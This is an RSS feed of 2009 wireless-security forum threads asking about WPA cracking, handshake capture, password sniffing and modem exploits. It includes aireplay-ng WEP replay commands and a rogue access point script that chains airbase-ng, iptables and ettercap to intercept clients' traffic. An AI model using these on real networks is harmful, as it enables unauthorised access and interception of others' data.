Remote Exploit Forums

Remote Exploit Forums - Wireless http://forums.remote-exploit.org/ en Sat, 21 Nov 2009 02:36:21 GMT vBulletin 60 http://forums.remote-exploit.org/images/backtrack4/misc/rss.jpg Remote Exploit Forums - Wireless http://forums.remote-exploit.org/ iwconfig need help!!!! http://forums.remote-exploit.org/wireless/28875-iwconfig-need-help.html Fri, 20 Nov 2009 08:26:36 GMT I'm trying to write a bash script to chk wpa2 from txt list 12 characters but it's seems that iwconfig dosent accept 12 characters when command 'iwconfig key ' is entred? any suggestion?

thx for helping ]]> Wireless gool54 http://forums.remote-exploit.org/wireless/28875-iwconfig-need-help.html WPA-PSK Algorithm question http://forums.remote-exploit.org/wireless/28738-wpa-psk-algorithm-question.html Sun, 15 Nov 2009 20:54:36 GMT Hi, I did alot of reasearch ( lots of google ) to understand how WPA-PSK works and I seems to be stuck, I know that its something like PMK =... Hi, I did alot of reasearch ( lots of google ) to understand how WPA-PSK works and I seems to be stuck, I know that its something like PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256) and that PTK is something like HMAC-SHA1(PMK(2-MACS from 2 first handshake packets, 2-NONCES from 2 first handshake packets))...

I'm kinda confused as how does this works and I'd like some help to understand it better.

For example:

SSID: co-public

gives

Hex: 5B45A05E645C40311BC77F299F4B424C03C41A9094B90A2DD6 7473B9D4850511

as the WPA-PSK hash, how would someone go from the 4-way handshake to get to the WPA-PSK hash? I looked on google alot and can't find anything good ( they only refer to wpa-psk crackers and my google-fu sucks ). If you could explain what is taken from each packet and what algorithm is done on the essid, macs, nonces and mic it would greatly help. *Would gladly accept pseudo-code*

Thanks! ]]> Wireless kotarel http://forums.remote-exploit.org/wireless/28738-wpa-psk-algorithm-question.html Drivers for ALFA AWUS036H rtl8187l - Linux http://forums.remote-exploit.org/wireless/28728-drivers-alfa-awus036h-rtl8187l-linux.html Sun, 15 Nov 2009 17:20:51 GMT MOD EDIT: Link removed. MOD EDIT: Link removed. ]]> Wireless rywos http://forums.remote-exploit.org/wireless/28728-drivers-alfa-awus036h-rtl8187l-linux.html <![CDATA[SpoonWPA's TCPDump File]]> http://forums.remote-exploit.org/wireless/28725-spoonwpas-tcpdump-file.html Sun, 15 Nov 2009 13:57:12 GMT Hey how ya going,
I'm in a little bit of a bother on the format that SpoonWPA spits out its .cap file (or maybe the problem isn't that end)

I've captured a handshake using SpoonWPA via my eeePC, purely for simplicity of use, only to find that later on when I tried to open it in Elcomsoft Wireless Security Auditor (using import TCPDump) it comes up with "can't read file" error.

Recapturing the handshake is not really an option for me.

After capturing the file I opened it on my eeePC with airoCrack to make sure it was caputered and it worked sweet (and still does even using windows AiroCrack)

Problem is my GTX295 is not being utilised in the process (was using AirCrack now CoWPAtty)

My question is "Does SpoonWPA produce a normal tcpdump file or should I be looking at the other end and cracking it using another program" ]]> Wireless Spliff666 http://forums.remote-exploit.org/wireless/28725-spoonwpas-tcpdump-file.html some one boardcasting a wireless signal with same ssid as mine http://forums.remote-exploit.org/wireless/28672-some-one-boardcasting-wireless-signal-same-ssid-mine.html Fri, 13 Nov 2009 20:07:57 GMT hello

I'm broadcasting a wireless internet to 20 clients,and I'm using pppoe , but some one is broadcasting with the same SSID as mine and with many different mac addresses , many of my clients have a bad net and disconnecting many times and tow of them even don't connect to my network ...

so,what you think i can do to solve this problem ?

PS :
i can't hide my signal because i need new client to know me and even if i change it he will know it

my clients are using 2.4MHz Grid like this
hxxp://dmsichina.com/grid/SP242409-400.jpg

And i'm using omni antenna to broadcast

i search a lot for a solution for this problem and even talked with many people in yahoo chat rooms and they all say that i must broadcast with a stronger signal , the problem is there is a high noise in my area and if i did this my net will be so slow ...

I don't know if you need other information ,best regards ]]> Wireless memo2009 http://forums.remote-exploit.org/wireless/28672-some-one-boardcasting-wireless-signal-same-ssid-mine.html NextNet Wireless Modem http://forums.remote-exploit.org/wireless/28577-nextnet-wireless-modem.html Wed, 11 Nov 2009 02:13:54 GMT I have a few questions concerning about the NextNet Wireless modem, after I canceled my account they've been wanting very much their modem back, there might be something sneakiy about it, so I decided to test it out, I have little/poor/none information I can bring, so I ask here proffesionals if there is something to do with it.

The modem doesnt have a DHCP Server, it provides me with a direct IP eg : 32.566.999.33 (EXAMPLE, I know 255 is the top, or 251)

I think the netmask is 255.255.255.255 if im not mistaken, and iv'e already made a Pararrel JTAG Cable with it, I need tools to see if I can get anything.

Now on SpeedTouch Server/1.0 I managed to do a Cisco Global Exploit (exploit #3 to be specific), now its suscesful, now what after that ?

On a Motorola Surfboard sb5101 I got the same output, I also used FastTrack AutoPwn feature, after certain exploits (like 30) the modem reboots, and the DHCP server crashes, or sometimes it simply freezes, I have to manually turn off and on the modem to get it back working, so im unable to complete the AutoPwn.

I also used HttPrint, I got the prints for both the SpeedTouch & the SB5101, but now after that, what to do ?

A little help for thiz noobz could really do something for his hobby.

These modems are mine, I do not intent to break rules, these are for testing and knoledgement and I assume no user from this Comunity will assume responsability, I understand these too . . .

Thanks in advance . . . . ]]> Wireless athacks http://forums.remote-exploit.org/wireless/28577-nextnet-wireless-modem.html Viewing passwords being sent to AP http://forums.remote-exploit.org/wireless/28543-viewing-passwords-being-sent-ap.html Tue, 10 Nov 2009 11:21:50 GMT Hey all. I have a spare router (WGR614v7) just sitting around, and I was wondering if it was possible to see passwords being sent to my AP. ... Hey all.

I have a spare router (WGR614v7) just sitting around, and I was wondering if it was possible to see passwords being sent to my AP.

There's no real reason for this, just pure curiosity to see what people use to try to gain access.

Cheers guys. ]]> Wireless seth grimshaw http://forums.remote-exploit.org/wireless/28543-viewing-passwords-being-sent-ap.html NetStumbler Useability? http://forums.remote-exploit.org/wireless/28347-netstumbler-useability.html Tue, 03 Nov 2009 18:58:03 GMT is Netstmbler 0.4.0 a useful tool? I see it hasn't been updated since 2004!
I downloaded it only to see that it does not recognize my Realtek RTL 8191SE PCI-E NIC.

Thanks,

Ray ]]> Wireless rayj00 http://forums.remote-exploit.org/wireless/28347-netstumbler-useability.html Building a cantenna http://forums.remote-exploit.org/wireless/28277-building-cantenna.html Sun, 01 Nov 2009 18:57:16 GMT For a while now I have considered building a homemade cantenna. I have finally decided to stop putting this project off, so it was time to do some... For a while now I have considered building a homemade cantenna. I have finally decided to stop putting this project off, so it was time to do some research.
After reading several websites and posts about these hi-gain antenna's I finally came across this site.

How to build a tin can waveguide antenna

The author has done some testing, I think they did a good job with what they had but I'm looking for further information. I'm wondering first off whether or not the ripples in a tin can would affect the gain and how?

My next question would be about what material to make this out of? Originally pringles can's were the choice of cheap antenna building, but these aren't built out of metal except for the bottom. Also the pringles can diamater is not large enough. This would leave me to believe that it doesnt matter what kind of material the antenna is built out of. I've taken a look at some commercial products and they seem to be made from aluminum.
So could I go buy a tube of pvc/aluminum/steel piping at the local hardware store and this should work just as well if not better because then I could get optimal sizes. ]]> Wireless hhmatt81 http://forums.remote-exploit.org/wireless/28277-building-cantenna.html Bypassing Mac filter http://forums.remote-exploit.org/wireless/28189-bypassing-mac-filter.html Fri, 30 Oct 2009 13:12:51 GMT Now I have been researching this for a while and no luck .. also lately I've decided to give back everything useful I find to the backtrack community before I go on i want to thank everyone for all their contributions and effort into making all this happen..

Now like I said before I have been researching this for a while and can't find any useful info.. Now I know that I can use a mac changer but I'm not trying to do that at the moment.. I was also wondering if I can use wireshark to just sniff the arp packets? ]]> Wireless Isohump http://forums.remote-exploit.org/wireless/28189-bypassing-mac-filter.html Not capturing packets correctly http://forums.remote-exploit.org/wireless/28147-not-capturing-packets-correctly.html Thu, 29 Oct 2009 09:40:43 GMT I'm having problem with capturing packets this the first time it has happened to me and i googled the problem. Now it works fine with backtrack 3 and ubuntu but for some reason with backtrack 4 it's not working, now these are the commands I'm using and the outputs I'm getting.

Code:

root@YOU:~# aireplay-ng -1 0 -a 00:1D:68:E8:9A:87 mon0

No source MAC (-h) specified. Using the device MAC (00:24:2B:7C:3E:9D)

22:46:04  Waiting for beacon frame (BSSID: 00:1D:68:E8:9A:87) on channel 1



22:46:04  Sending Authentication Request (Open System) [ACK]

22:46:04  Authentication successful

22:46:04  Sending Association Request [ACK]

22:46:04  Association successful :-) (AID: 1)

root@YOU:~# aireplay-ng -3 -b 00:1D:68:E8:9A:87 mon0

No source MAC (-h) specified. Using the device MAC (00:24:2B:7C:3E:9D)

22:46:32  Waiting for beacon frame (BSSID: 00:1D:68:E8:9A:87) on channel 1

Saving ARP requests in replay_arp-1028-224632.cap

You should also start airodump-ng to capture replies.

1280 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

I know it said it didn't specify a mac but even when i do specify a mac it still doesn't work..

Code:

 CH  1 ][ Elapsed: 2 mins ][ 2009-10-28 22:48



 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID



 00:1D:68:E8:9A:87  -60 100     1653       73    0   1  54   WEP  WEP    OPN  Thomson1492EA



 BSSID              STATION            PWR   Rate    Lost  Packets  Probes



 00:1D:68:E8:9A:87  00:11:22:33:44:55   -1    1 - 0      0        2

 00:1D:68:E8:9A:87  00:24:2B:7C:3E:9D    0    1 - 1      0       25

Any suggestions would be great.... THNX ]]> Wireless Isohump http://forums.remote-exploit.org/wireless/28147-not-capturing-packets-correctly.html sniffing passwords and hashes from a wireless network http://forums.remote-exploit.org/wireless/28146-sniffing-passwords-hashes-wireless-network.html Thu, 29 Oct 2009 07:19:57 GMT hi guys, any one of you know of any tool that sniffs passwords and hashes from a wireless network. or maybe looks at a pcap file and extracts them.... hi guys,
any one of you know of any tool that sniffs passwords and hashes from a wireless network. or maybe looks at a pcap file and extracts them. i'm looking for one that sniffs without joining the network(s). i know dsniff but it only detects cleartext passwords (am i wrong?) but i also need hashes to crack.
thanks a lot ]]> Wireless kalgecin http://forums.remote-exploit.org/wireless/28146-sniffing-passwords-hashes-wireless-network.html airbase-ng clients getting wrong dhcp settings from internet side http://forums.remote-exploit.org/wireless/28133-airbase-ng-clients-getting-wrong-dhcp-settings-internet-side.html Wed, 28 Oct 2009 20:15:28 GMT I have been testing airbase-ng. I have had it working properly when my PC handed the client the proper dhcp address. The problem I am having most... I have been testing airbase-ng.
I have had it working properly when my PC handed the client the proper dhcp address. The problem I am having most is the dhcp server on the other side of the my rogue laptop passing DHCP settings to the client. Is there a way to block this.

I was thinking maybe iptables could block the wrong dhcp server on the internet side of the rogue laptop from handing out addresses.

Has anyone else had this problem and if so what is your workaround?

Here is the launch script

Code:

iface="wlan0"

gw="eth1"



killall -9  airbase-ng dnsmasq driftnet ettercap

xterm -geometry 96x25+0+0 -e airbase-ng -e FreeWifi -P -C 15 $iface &

sleep 5

ifconfig at0 10.0.0.1 netmask 255.255.255.0 up

sleep 3

/etc/init.d/dnsmasq start

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -o $gw -j MASQUERADE

sleep 3

xterm -geometry 96x25+0+0 -e ettercap -T -i at0 -q &

sleep 3

echo 1 > /proc/sys/net/ipv4/ip_forward

driftnet -i at0

]]> Wireless sabo1 http://forums.remote-exploit.org/wireless/28133-airbase-ng-clients-getting-wrong-dhcp-settings-internet-side.html gerix-wifi-cracker not working http://forums.remote-exploit.org/wireless/28094-gerix-wifi-cracker-not-working.html Tue, 27 Oct 2009 16:43:23 GMT Hello you guys,

I need some help here.
I believe I've made some upgrades that prevent me from executing gerix-wifi-cracker on my ubuntu machine.
Everytime i try to run gerix i get the following:

root@death-start:#python gerix.py
No protocol specified
gerix.py: cannot connect to X server :0

Can anyone help me? ]]> Wireless zbenta http://forums.remote-exploit.org/wireless/28094-gerix-wifi-cracker-not-working.html Cracking WPA/WPA2 From BT4 CD http://forums.remote-exploit.org/wireless/28033-cracking-wpa-wpa2-bt4-cd.html Sun, 25 Oct 2009 22:47:13 GMT Sorry if this has been a topic of the past but I can't seem to find were anyone has posted this. I did search first but could not find a result for which would appear to be such a common question.

I download BT4 ISO and burned it to a CD/ROM I am using Back Track 4 beta from my CD/ROM Drive. Is there a method available to perform the dictionary attack while loading BT4 from my CD ROM?

I can download the 33 Gig list and place it on one of my external hard drives. But this will be done in windows xp. I'm kinda looking at VMware but I'd rather if I could, save the Handshake data to disk from with inside of BT4 then reboot to XP and use a program to perform the passphrase attack.

If not, Is it possible, while running BT4 from CD/ROM perform the dictionary attack? Or is there just no other way except to install VMware?

P.S.> Once last question. Does the BackTrack 4 ISO CD have a dictionary on it already?

If at all possible, I'd much rather simply peform the attack while the BT4 CD is in my CD/ROM drive. ]]> Wireless vynum http://forums.remote-exploit.org/wireless/28033-cracking-wpa-wpa2-bt4-cd.html